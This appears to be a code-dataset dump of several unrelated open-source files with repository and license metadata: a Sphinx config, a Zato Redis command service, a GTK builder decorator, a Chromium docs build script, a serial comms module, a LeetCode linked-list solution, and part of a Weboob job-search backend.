# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'armstrong' # 'linfiniti-sphinx-theme' # 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['themes']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
html_use_index = True
html_use_modindex = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'period'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'period.tex', u'period Documentation',
u'LCS', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'period', u'period Documentation',
[u'LCS'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'period', u'period Documentation',
u'LCS', 'period', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| artistic-2.0 | 6,534,941,978,792,994,000 | 30.829545 | 80 | 0.697132 | false |
alirizakeles/zato | code/zato-server/test/zato/server/service/internal/kvdb/__init__.py | 1 | 2245 | # -*- coding: utf-8 -*-
"""
Copyright (C) 2013 Dariusz Suchojad <dsuch at zato.io>
Licensed under LGPLv3, see LICENSE.txt for terms and conditions.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# stdlib
from traceback import format_exc
# Zato
from zato.common import ZatoException
from zato.common.kvdb import redis_grammar
from zato.server.service.internal import AdminService, AdminSIO
class ExecuteCommand(AdminService):
""" Executes a command against the key/value DB.
"""
class SimpleIO(AdminSIO):
request_elem = 'zato_kvdb_remote_command_execute_request'
response_elem = 'zato_kvdb_remote_command_execute_response'
input_required = ('command',)
output_required = ('result',)
def handle(self):
input_command = self.request.input.command or ''
if not input_command:
msg = 'No command sent'
raise ZatoException(self.cid, msg)
try:
parse_result = redis_grammar.parseString(input_command)
options = {}
command = parse_result.command
parameters = parse_result.parameters if parse_result.parameters else []
if command == 'CONFIG':
options['parse'] = parameters[0]
elif command == 'OBJECT':
options['infotype'] = parameters[0]
response = self.server.kvdb.conn.execute_command(command, *parameters, **options) or ''
if response and command in('KEYS', 'HKEYS', 'HVALS'):
response = unicode(response).encode('utf-8')
elif command in('HLEN', 'LLEN', 'LRANGE', 'SMEMBERS', 'HGETALL'):
response = str(response)
self.response.payload.result = response
except Exception, e:
msg = 'Command parsing error, command:[{}], e:[{}]'.format(input_command, format_exc(e))
self.logger.error(msg)
raise ZatoException(self.cid, msg)
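# Illustrative request/response shape implied by the SimpleIO declaration above
# (sketch only, values are placeholders):
#
#   request:  {'zato_kvdb_remote_command_execute_request': {'command': 'GET foo'}}
#   response: {'zato_kvdb_remote_command_execute_response': {'result': 'bar'}}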
# The data browser will most likely be implemented in a future version
'''
class GetList(AdminService):
""" Returns a list of keys, optionally including their values.
"""
# KEYS, then
# HGETALL
# GET
# LRANGE
# SMEMBERS
'''
| gpl-3.0 | 4,555,896,742,429,259,300 | 30.180556 | 100 | 0.621826 | false |
semplice/quickstart | quickstart/builder.py | 1 | 2423 | # -*- coding: utf-8 -*-
#
# quickstart - Refreshing the GUI world.
# Copyright (C) 2013 Eugenio "g7" Paolantonio
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
from gi.repository import Gtk
class from_file:
""" builder.from_file is a class decorator that will automatically load
	the UI file specified in the arguments into a Gtk.Builder object.
A Dynamic dictionary will be created in class.objects. This special dict
gets the UI objects on-the-fly.
The only required parameter is the UI file position.
Usage example:
@quickstart.builder.from_file("./test.glade")
class GUI:
def __init__(self):
self.objects["main_window"].show_all()
The Gtk.Builder object will be created at class.__builder. """
class DynamicObjectsDictionary(dict):
""" A dynamic dictionary! """
def __init__(self, builder):
self.builder = builder
dict.__init__(self)
def __getitem__(self, key):
""" Returns the specified object if it is already in the dictionary,
otherwise gets it from the builder first and then returns it. """
itm = self.get(key)
if not itm:
obj = self.builder.get_object(key)
if not obj:
raise Exception("Object %s not found!" % key)
self[key] = obj
itm = obj
return itm
__getattr__ = __getitem__
__setattr__ = dict.__setitem__
__delattr__ = dict.__delitem__
def __init__(self, uipath):
""" Initializes the class. """
self.uipath = uipath
def __call__(self, clss):
""" Magic. """
def wrapper(*args, **kwargs):
clss.__builder = Gtk.Builder()
clss.__builder.add_from_file(self.uipath)
clss.objects = self.DynamicObjectsDictionary(clss.__builder)
return clss(*args, **kwargs)
return wrapper
| lgpl-2.1 | -5,219,807,691,265,484,000 | 27.505882 | 80 | 0.684276 | false |
junmin-zhu/chromium-rivertrail | chrome/common/extensions/docs/server2/build_server.py | 1 | 2634 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This script is used to copy all dependencies into the local directory.
# The package of files can then be uploaded to App Engine.
import os
import shutil
import stat
import sys
SRC_DIR = os.path.join(sys.path[0], os.pardir, os.pardir, os.pardir, os.pardir,
os.pardir)
THIRD_PARTY_DIR = os.path.join(SRC_DIR, 'third_party')
LOCAL_THIRD_PARTY_DIR = os.path.join(sys.path[0], 'third_party')
TOOLS_DIR = os.path.join(SRC_DIR, 'tools')
SCHEMA_COMPILER_FILES = ['model.py', 'idl_schema.py', 'schema_util.py']
def MakeInit(path):
path = os.path.join(path, '__init__.py')
with open(os.path.join(path), 'w') as f:
os.utime(os.path.join(path), None)
def OnError(function, path, excinfo):
os.chmod(path, stat.S_IWUSR)
function(path)
def CopyThirdParty(src, dest, files=None):
dest_path = os.path.join(LOCAL_THIRD_PARTY_DIR, dest)
if not files:
shutil.copytree(src, dest_path)
MakeInit(dest_path)
return
try:
os.makedirs(dest_path)
except Exception:
pass
MakeInit(dest_path)
for filename in files:
shutil.copy(os.path.join(src, filename), os.path.join(dest_path, filename))
def main():
if os.path.isdir(LOCAL_THIRD_PARTY_DIR):
try:
shutil.rmtree(LOCAL_THIRD_PARTY_DIR, False, OnError)
except OSError:
print('*-------------------------------------------------------------*\n'
'| If you are receiving an upload error, try removing |\n'
'| chrome/common/extensions/docs/server2/third_party manually. |\n'
'*-------------------------------------------------------------*\n')
CopyThirdParty(os.path.join(THIRD_PARTY_DIR, 'handlebar'), 'handlebar')
CopyThirdParty(os.path.join(SRC_DIR, 'ppapi', 'generators'),
'json_schema_compiler')
CopyThirdParty(os.path.join(THIRD_PARTY_DIR, 'ply'),
os.path.join('json_schema_compiler', 'ply'))
CopyThirdParty(os.path.join(TOOLS_DIR, 'json_schema_compiler'),
'json_schema_compiler',
SCHEMA_COMPILER_FILES)
CopyThirdParty(TOOLS_DIR, 'json_schema_compiler', ['json_comment_eater.py'])
MakeInit(LOCAL_THIRD_PARTY_DIR)
# To be able to use the Handlebar class we need this import in __init__.py.
with open(os.path.join(LOCAL_THIRD_PARTY_DIR,
'handlebar',
'__init__.py'), 'a') as f:
f.write('from handlebar import Handlebar\n')
if __name__ == '__main__':
main()
| bsd-3-clause | 5,980,907,068,329,087,000 | 35.583333 | 80 | 0.621868 | false |
ddimensia/RaceCapture_App | autosportlabs/comms/comms.py | 1 | 5498 | import traceback
import threading
import multiprocessing
from Queue import Empty
from time import sleep
from kivy.logger import Logger
from autosportlabs.comms.commscommon import PortNotOpenException
STAY_ALIVE_TIMEOUT = 4
COMMAND_CLOSE = 'CLOSE'
COMMAND_KEEP_ALIVE = 'PING'
def connection_process_message_reader(rx_queue, connection, should_run):
Logger.debug('Comms: connection process message reader started')
while should_run.is_set():
try:
msg = connection.read_line()
if msg:
rx_queue.put(msg)
except:
Logger.error('Comms: Exception in connection_process_message_reader')
Logger.debug(traceback.format_exc())
should_run.clear()
sleep(0.5)
Logger.debug('Comms: connection process message reader exited')
def connection_process_message_writer(tx_queue, connection, should_run):
Logger.debug('Comms: connection process message writer started')
while should_run.is_set():
try:
message = tx_queue.get(True, 1.0)
if message:
connection.write(message)
except Empty:
pass
except Exception as e:
Logger.error('Comms: Exception in connection_process_message_writer ' + str(e))
Logger.debug(traceback.format_exc())
should_run.clear()
sleep(0.5)
Logger.debug('Comms: connection process message writer exited')
def connection_message_process(connection, device, rx_queue, tx_queue, command_queue):
Logger.debug('Comms: connection process starting')
try:
connection.open(device)
connection.flushInput()
connection.flushOutput()
reader_writer_should_run = threading.Event()
reader_writer_should_run.set()
reader_thread = threading.Thread(target=connection_process_message_reader, args=(rx_queue, connection, reader_writer_should_run))
reader_thread.start()
writer_thread = threading.Thread(target=connection_process_message_writer, args=(tx_queue, connection, reader_writer_should_run))
writer_thread.start()
while reader_writer_should_run.is_set():
try:
command = command_queue.get(True, STAY_ALIVE_TIMEOUT)
if command == COMMAND_CLOSE:
Logger.debug('Comms: connection process: got close command')
reader_writer_should_run.clear()
except Empty:
Logger.debug('Comms: keep alive timeout')
reader_writer_should_run.clear()
Logger.debug('Comms: connection worker exiting')
reader_thread.join()
writer_thread.join()
try:
connection.close()
except:
Logger.debug('Comms: Exception closing connection worker connection')
Logger.debug(traceback.format_exc())
except Exception as e:
Logger.debug('Comms: Exception setting up connection process: ' + str(type(e)) + str(e))
Logger.trace(traceback.format_exc())
Logger.debug('Comms: connection worker exited')
class Comms():
CONNECT_TIMEOUT = 1.0
DEFAULT_TIMEOUT = 1.0
QUEUE_FULL_TIMEOUT = 1.0
_timeout = DEFAULT_TIMEOUT
device = None
_connection = None
_connection_process = None
_rx_queue = None
_tx_queue = None
_command_queue = None
def __init__(self, device, connection):
self.device = device
self._connection = connection
self.supports_streaming = False
def start_connection_process(self):
rx_queue = multiprocessing.Queue()
tx_queue = multiprocessing.Queue(5)
command_queue = multiprocessing.Queue()
connection_process = multiprocessing.Process(target=connection_message_process, args=(self._connection, self.device, rx_queue, tx_queue, command_queue))
connection_process.start()
self._rx_queue = rx_queue
self._tx_queue = tx_queue
self._command_queue = command_queue
self._connection_process = connection_process
def get_available_devices(self):
return self._connection.get_available_devices()
def isOpen(self):
return self._connection_process != None and self._connection_process.is_alive()
def open(self):
connection = self._connection
Logger.debug('Comms: Opening connection ' + str(self.device))
self.start_connection_process()
def keep_alive(self):
try:
self._command_queue.put_nowait(COMMAND_KEEP_ALIVE)
except:
pass
def close(self):
Logger.debug('Comms: comms.close()')
if self.isOpen():
try:
Logger.debug('Comms: closing connection process')
self._command_queue.put_nowait(COMMAND_CLOSE)
self._connection_process.join(self._timeout * 2)
Logger.debug('Comms: connection process joined')
except:
Logger.error('Comms: Timeout joining connection process')
def read_message(self):
if not self.isOpen():
raise PortNotOpenException('Port Closed')
try:
return self._rx_queue.get(True, self._timeout)
except: # returns Empty object if timeout is hit
return None
def write_message(self, message):
if not self.isOpen(): raise PortNotOpenException('Port Closed')
self._tx_queue.put(message, True, Comms.QUEUE_FULL_TIMEOUT)
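# Rough usage sketch (illustration only; `SerialConnection` is a placeholder for a
# concrete connection implementation used with this class):
#
#   comms = Comms('/dev/ttyACM0', SerialConnection())
#   comms.open()
#   comms.write_message('some message\r\n')
#   reply = comms.read_message()      # None on timeout
#   comms.keep_alive()                # must be called periodically or the worker exits
#   comms.close()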
| gpl-3.0 | -2,222,995,248,042,992,600 | 34.701299 | 160 | 0.631139 | false |
franklingu/leetcode-solutions | questions/palindrome-linked-list/Solution.py | 1 | 1513 | """
Given a singly linked list, determine if it is a palindrome.
Example 1:
Input: 1->2
Output: false
Example 2:
Input: 1->2->2->1
Output: true
Follow up:
Could you do it in O(n) time and O(1) space?
"""
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def isPalindrome(self, head):
"""
:type head: ListNode
:rtype: bool
"""
def reverse_ll(head):
prev, curr, ne = None, head, head.next
while curr is not None:
curr.next = prev
prev = curr
curr = ne
if ne:
ne = ne.next
return prev
if head is None or head.next is None:
return True
fast, slow = head, head
while fast is not None:
fast = fast.next
if fast is None:
break
fast = fast.next
if fast is None:
break
slow = slow.next
second = slow.next
slow.next = None
new_head = reverse_ll(second)
curr1, curr2 = head, new_head
ret = True
while curr1 is not None and curr2 is not None:
if curr1.val != curr2.val:
ret = False
break
curr1 = curr1.next
curr2 = curr2.next
slow.next = reverse_ll(new_head)
return ret
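# Quick check sketch (not part of the submitted solution; assumes the ListNode
# class from the comment above is defined):
#
#   nodes = [ListNode(v) for v in (1, 2, 2, 1)]
#   for a, b in zip(nodes, nodes[1:]):
#       a.next = b
#   assert Solution().isPalindrome(nodes[0]) is True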
| mit | -2,569,556,633,888,039,400 | 23.403226 | 60 | 0.489095 | false |
blckshrk/Weboob | modules/popolemploi/backend.py | 1 | 17379 | # -*- coding: utf-8 -*-
# Copyright(C) 2013 Bezleputh
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.backend import BaseBackend, BackendConfig
from weboob.capabilities.job import ICapJob
from weboob.tools.value import Value
from weboob.tools.ordereddict import OrderedDict
from .browser import PopolemploiBrowser
from .job import PopolemploiJobAdvert
__all__ = ['PopolemploiBackend']
class PopolemploiBackend(BaseBackend, ICapJob):
NAME = 'popolemploi'
DESCRIPTION = u'Pole Emploi website'
MAINTAINER = u'Bezleputh'
EMAIL = '[email protected]'
VERSION = '0.h'
BROWSER = PopolemploiBrowser
places_choices = OrderedDict([(k, u'%s' % (v)) for k, v in sorted({
'100|FRANCE|FRANCE': u'France entière',
'102|REGION|checkbox': u'Alsace',
'103|DEPARTEMENT|checkbox_66': u'-- Rhin (Bas) (67)',
'104|DEPARTEMENT|checkbox_67': u'-- Rhin (Haut) (68)',
'105|REGION|checkbox_0': u'Aquitaine',
'106|DEPARTEMENT|checkbox_21': u'-- Dordogne (24)',
'107|DEPARTEMENT|checkbox_32': u'-- Gironde (33)',
'108|DEPARTEMENT|checkbox_39': u'-- Landes (40)',
'109|DEPARTEMENT|checkbox_46': u'-- Lot et Garonne (47)',
'110|DEPARTEMENT|checkbox_63': u'-- Pyrénées Atlantiques (64)',
'111|REGION|checkbox_1': u'Auvergne',
'112|DEPARTEMENT|checkbox_1': u'-- Allier (03)',
'113|DEPARTEMENT|checkbox_13': u'-- Cantal (15)',
'114|DEPARTEMENT|checkbox_42': u'-- Loire (Haute) (43)',
'115|DEPARTEMENT|checkbox_62': u'-- Puy de Dôme (63)',
'116|REGION|checkbox_2': u'Bourgogne',
'117|DEPARTEMENT|checkbox_18': u'-- Côte d\'Or (21)',
'118|DEPARTEMENT|checkbox_57': u'-- Nièvre (58)',
'119|DEPARTEMENT|checkbox_70': u'-- Saône et Loire (71)',
'120|DEPARTEMENT|checkbox_88': u'-- Yonne (89)',
'121|REGION|checkbox_3': u'Bretagne',
'122|DEPARTEMENT|checkbox_19': u'-- Côtes d\'Armor (22)',
'123|DEPARTEMENT|checkbox_26': u'-- Finistère (29)',
'124|DEPARTEMENT|checkbox_34': u'-- Ille et Vilaine (35)',
'125|DEPARTEMENT|checkbox_54': u'-- Morbihan (56)',
'126|REGION|checkbox_4': u'Centre',
'127|DEPARTEMENT|checkbox_16': u'-- Cher (18)',
'128|DEPARTEMENT|checkbox_25': u'-- Eure et Loir (28)',
'129|DEPARTEMENT|checkbox_35': u'-- Indre (36)',
'130|DEPARTEMENT|checkbox_36': u'-- Indre et Loire (37)',
'131|DEPARTEMENT|checkbox_40': u'-- Loir et Cher (41)',
'132|DEPARTEMENT|checkbox_44': u'-- Loiret (45)',
'133|REGION|checkbox_5': u'Champagne Ardenne',
'134|DEPARTEMENT|checkbox_6': u'-- Ardennes (08)',
'135|DEPARTEMENT|checkbox_8': u'-- Aube (10)',
'136|DEPARTEMENT|checkbox_50': u'-- Marne (51)',
'137|DEPARTEMENT|checkbox_51': u'-- Marne (Haute) (52)',
'138|REGION|checkbox_6': u'Corse',
'139|DEPARTEMENT|checkbox_26': u'-- Corse du Sud (2A)',
'140|DEPARTEMENT|checkbox_27': u'-- Haute Corse (2B)',
'141|REGION|checkbox_7': u'Franche Comté',
'142|DEPARTEMENT|checkbox_89': u'-- Belfort (Territoire de) (90)',
'143|DEPARTEMENT|checkbox_22': u'-- Doubs (25)',
'144|DEPARTEMENT|checkbox_38': u'-- Jura (39)',
'145|DEPARTEMENT|checkbox_69': u'-- Saône (Haute) (70)',
'146|REGION|checkbox_8': u'Ile de France',
'147|DEPARTEMENT|checkbox_90': u'-- Essonne (91)',
'148|DEPARTEMENT|checkbox_91': u'-- Hauts de Seine (92)',
'149|DEPARTEMENT|checkbox_74': u'-- Paris (Dept.) (75)',
'150|DEPARTEMENT|checkbox_92': u'-- Seine Saint Denis (93)',
'151|DEPARTEMENT|checkbox_76': u'-- Seine et Marne (77)',
'152|DEPARTEMENT|checkbox_94': u'-- Val d\'Oise (95)',
'153|DEPARTEMENT|checkbox_93': u'-- Val de Marne (94)',
'154|DEPARTEMENT|checkbox_77': u'-- Yvelines (78)',
'155|REGION|checkbox_9': u'Languedoc Roussillon',
'156|DEPARTEMENT|checkbox_9': u'-- Aude (11)',
'157|DEPARTEMENT|checkbox_39': u'-- Gard (30)',
'158|DEPARTEMENT|checkbox_33': u'-- Hérault (34)',
'159|DEPARTEMENT|checkbox_47': u'-- Lozère (48)',
'161|DEPARTEMENT|checkbox_65': u'-- Pyrénées Orientales (66)',
'162|REGION|checkbox_10': u'Limousin',
'163|DEPARTEMENT|checkbox_17': u'-- Corrèze (19)',
'164|DEPARTEMENT|checkbox_20': u'-- Creuse (23)',
'165|DEPARTEMENT|checkbox_86': u'-- Vienne (Haute) (87)',
'166|REGION|checkbox_11': u'Lorraine',
'167|DEPARTEMENT|checkbox_53': u'-- Meurthe et Moselle (54)',
'168|DEPARTEMENT|checkbox_54': u'-- Meuse (55)',
'169|DEPARTEMENT|checkbox_56': u'-- Moselle (57)',
'170|DEPARTEMENT|checkbox_87': u'-- Vosges (88)',
'171|REGION|checkbox_12': u'Midi Pyrénées',
'172|DEPARTEMENT|checkbox_7': u'-- Ariège (09)',
'173|DEPARTEMENT|checkbox_10': u'-- Aveyron (12)',
'174|DEPARTEMENT|checkbox_30': u'-- Garonne (Haute) (31)',
'175|DEPARTEMENT|checkbox_31': u'-- Gers (32)',
'176|DEPARTEMENT|checkbox_45': u'-- Lot (46)',
'177|DEPARTEMENT|checkbox_64': u'-- Pyrénées (Hautes) (65)',
'178|DEPARTEMENT|checkbox_80': u'-- Tarn (81)',
'179|DEPARTEMENT|checkbox_81': u'-- Tarn et Garonne (82)',
'180|REGION|checkbox_13': u'Nord Pas de Calais',
'181|DEPARTEMENT|checkbox_58': u'-- Nord (59)',
'182|DEPARTEMENT|checkbox_61': u'-- Pas de Calais (62)',
'183|REGION|checkbox_14': u'Normandie (Basse)',
'184|DEPARTEMENT|checkbox_12': u'-- Calvados (14)',
'185|DEPARTEMENT|checkbox_49': u'-- Manche (50)',
'186|DEPARTEMENT|checkbox_60': u'-- Orne (61)',
'187|REGION|checkbox_15': u'Normandie (Haute)',
'188|DEPARTEMENT|checkbox_24': u'-- Eure (27)',
'189|DEPARTEMENT|checkbox_75': u'-- Seine Maritime (76)',
'190|REGION|checkbox_16': u'Pays de la Loire',
'191|DEPARTEMENT|checkbox_43': u'-- Loire Atlantique (44)',
'192|DEPARTEMENT|checkbox_48': u'-- Maine et Loire (49)',
'193|DEPARTEMENT|checkbox_52': u'-- Mayenne (53)',
'194|DEPARTEMENT|checkbox_71': u'-- Sarthe (72)',
'195|DEPARTEMENT|checkbox_84': u'-- Vendée (85)',
'196|REGION|checkbox_17': u'Picardie',
'197|DEPARTEMENT|checkbox_0': u'-- Aisne (02)',
'198|DEPARTEMENT|checkbox_59': u'-- Oise (60)',
'199|DEPARTEMENT|checkbox_79': u'-- Somme (80)',
'200|REGION|checkbox_18': u'Poitou Charentes',
'201|DEPARTEMENT|checkbox_14': u'-- Charente (16)',
'202|DEPARTEMENT|checkbox_15': u'-- Charente Maritime (17)',
'203|DEPARTEMENT|checkbox_78': u'-- Sèvres (Deux) (79)',
'204|DEPARTEMENT|checkbox_85': u'-- Vienne (86)',
'205|REGION|checkbox_19': u'Provence Alpes Côte d\'Azur',
'206|DEPARTEMENT|checkbox_3': u'-- Alpes (Hautes) (05)',
'207|DEPARTEMENT|checkbox_4': u'-- Alpes Maritimes (06)',
'208|DEPARTEMENT|checkbox_2': u'-- Alpes de Haute Provence (04)',
'209|DEPARTEMENT|checkbox_13': u'-- Bouches du Rhône (13)',
'210|DEPARTEMENT|checkbox_82': u'-- Var (83)',
'211|DEPARTEMENT|checkbox_83': u'-- Vaucluse (84)',
'212|REGION|checkbox_20': u'Rhône Alpes',
'213|DEPARTEMENT|checkbox': u'-- Ain (01)',
'214|DEPARTEMENT|checkbox_5': u'-- Ardèche (07)',
'215|DEPARTEMENT|checkbox_23': u'-- Drôme (26)',
'216|DEPARTEMENT|checkbox_37': u'-- Isère (38)',
'217|DEPARTEMENT|checkbox_41': u'-- Loire (42)',
'218|DEPARTEMENT|checkbox_68': u'-- Rhône (69)',
'219|DEPARTEMENT|checkbox_72': u'-- Savoie (73)',
'220|DEPARTEMENT|checkbox_73': u'-- Savoie (Haute) (74)',
'221|REGION|checkbox_21': u'Région Antilles / Guyane',
'222|DEPARTEMENT|checkbox_95': u'-- Guadeloupe (971)',
'223|DEPARTEMENT|checkbox_97': u'-- Guyane (973)',
'224|DEPARTEMENT|checkbox_96': u'-- Martinique (972)',
'225|DEPARTEMENT|checkbox_101': u'-- Saint Barthélémy (977)',
'226|DEPARTEMENT|checkbox_102': u'-- Saint Martin (978)',
'227|REGION|checkbox_22': u'Région Atlantique Nord',
'228|DEPARTEMENT|checkbox_99': u'-- Saint Pierre et Miquelon (975)',
'229|REGION|checkbox_23': u'Région Pacifique',
'230|DEPARTEMENT|checkbox_107': u'-- Ile de Clipperton (989)',
'231|DEPARTEMENT|checkbox_106': u'-- Nouvelle Calédonie (988)',
'232|DEPARTEMENT|checkbox_105': u'-- Polynésie française (987)',
'233|DEPARTEMENT|checkbox_103': u'-- Terres australes/antarctiques (984)',
'234|DEPARTEMENT|checkbox_104': u'-- Wallis et Futuna (986)',
'235|REGION|checkbox_24': u'Région Réunion / Mayotte',
'236|DEPARTEMENT|checkbox_100': u'-- Mayotte (976)',
'237|DEPARTEMENT|checkbox_98': u'-- Réunion (974)',
}.iteritems())])
type_contrat_choices = OrderedDict([(k, u'%s' % (v)) for k, v in sorted({
' ': u'Tous types de contrats',
'11': u'CDI tout public',
'14': u'CDI alternance',
'13': u'CDI insertion',
'12': u'CDD tout public',
'16': u'CDD alternance',
'15': u'CDD insertion',
'10': u'CDD Senior',
'3': u'Mission d\'intérim',
'4': u'Contrat de travail saisonnier',
'5': u'Contrat de travail intermittent',
'8': u'Franchise',
'7': u'Profession libérale',
'9': u'Reprise d\'entreprise',
'6': u'Profession commerciale',
}.iteritems())])
salary_choices = OrderedDict([(k, u'%s' % (v)) for k, v in sorted({
' ': u'Tout salaire annuel',
'FOURCHETTE1': u'Moins de 15000',
'FOURCHETTE2': u'Compris entre 15000 et 18000',
'FOURCHETTE3': u'Compris entre 18000 et 21000',
'FOURCHETTE4': u'Compris entre 21000 et 24000',
'FOURCHETTE5': u'Compris entre 24000 et 36000',
'FOURCHETTE6': u'Compris entre 36000 et 60000',
'FOURCHETTE7': u'Supérieur à 60000',
}.iteritems())])
qualification_choices = OrderedDict([(k, u'%s' % (v)) for k, v in sorted({
' ': u'Toute Qualification',
'1': u'Manoeuvre',
'2': u'Ouvrier spécialisé',
'3': u'Ouvrier qualifié (P1,P2)',
'4': u'Ouvrier qualifié (P3,P4,OHQ)',
'5': u'Employé non qualifié',
'6': u'Employé qualifié',
'7': u'Technicien',
'8': u'Agent de maîtrise',
'9': u'Cadre',
}.iteritems())])
limit_date_choices = OrderedDict([(k, u'%s' % (v)) for k, v in sorted({
'': u'Aucune limite',
'UN_JOUR': u'Hier',
'TROIS_JOUR': u'3 jours',
'UNE_SEMAINE': u'1 semaine',
'DEUX_SEMAINES': u'2 semaines',
'UN_MOIS': u'1 mois',
'TROIS_MOIS': u'3 mois',
}.iteritems())])
domain_choices = OrderedDict([(k, u'%s' % (v)) for k, v in sorted({
' ': u'Tout secteur d\'activité',
'88': u'Action sociale sans hebergt',
'82': u'Activ.admin/soutien entreprise',
'66': u'Activ. auxiliaire finance/assu',
'90': u'Activ. crea/artistiq/spectacle',
'77': u'Activ. de loc. et loc.-bail',
'70': u'Activ. siege soc/conseil gest.',
'93': u'Activ. sportive/recreat/loisir',
'69': u'Activite juridique/comptable',
'94': u'Activite organisations assoc.',
'86': u'Activite pr la sante humaine',
'53': u'Activites de poste/courrier',
'64': u'Activite services financiers',
'68': u'Activites immobilieres',
'62': u'Activites informatiques',
'78': u'Activites liees a l\'emploi',
'75': u'Activites veterinaires',
'84': u'Administration publiq/defense',
'79': u'Agences voyage/activ. liees',
'71': u'Archi/ing/control/analyse tech',
'65': u'Assurance',
'32': u'Autre industrie manufacturiere',
'74': u'Autres activ.spe scientif/tech',
'08': u'Autres industries extractives',
'91': u'Biblio/ musée/ activ. culturel',
'36': u'Captage/traitement/distrib.eau',
'19': u'Cokefaction et raffinage',
'37': u'Collecte/traitement eaux usees',
'38': u'Collecte/traitnt/elimin dechet',
'45': u'Commerce/reparation auto/moto',
'47': u'Commerce detail sauf auto/moto',
'46': u'Commerce gros sauf auto/moto',
'41': u'Construction de batiments',
'01': u'Cult./prod. animale, chasse',
'39': u'Depollution/autre gest. dechet',
'58': u'Edition',
'80': u'Enquetes et securite',
'85': u'Enseignement',
'52': u'Entreposage/sce auxil. transp',
'06': u'Extraction d\'hydrocarbures',
'05': u'Extraction houille/ lignite',
'07': u'Extraction minerais metalliq.',
'26': u'Fab. prod. info/electro/optiq',
'22': u'Fabr. prod. caoutchouc/plastiq',
'30': u'Fabric. autre materiel transp.',
'23': u'Fabric.autre produit non metal',
'28': u'Fabric. autres machines/equip.',
'27': u'Fabric. d\'equip. electriques',
'31': u'Fabrication de meubles',
'12': u'Fabrication produit base tabac',
'25': u'Fabrication produits metalliq',
'42': u'Genie civil',
'55': u'Hebergement',
'87': u'Hebergt médico-social/ social',
'18': u'Imprimerie/reprod. enregistre.',
'00': u'Indetermine',
'29': u'Industrie automobile',
'20': u'Industrie chimique',
'14': u'Industrie de l\'habillement',
'11': u'Industrie des boissons',
'15': u'Industrie du cuir/la chaussure',
'17': u'Industrie du papier/du carton',
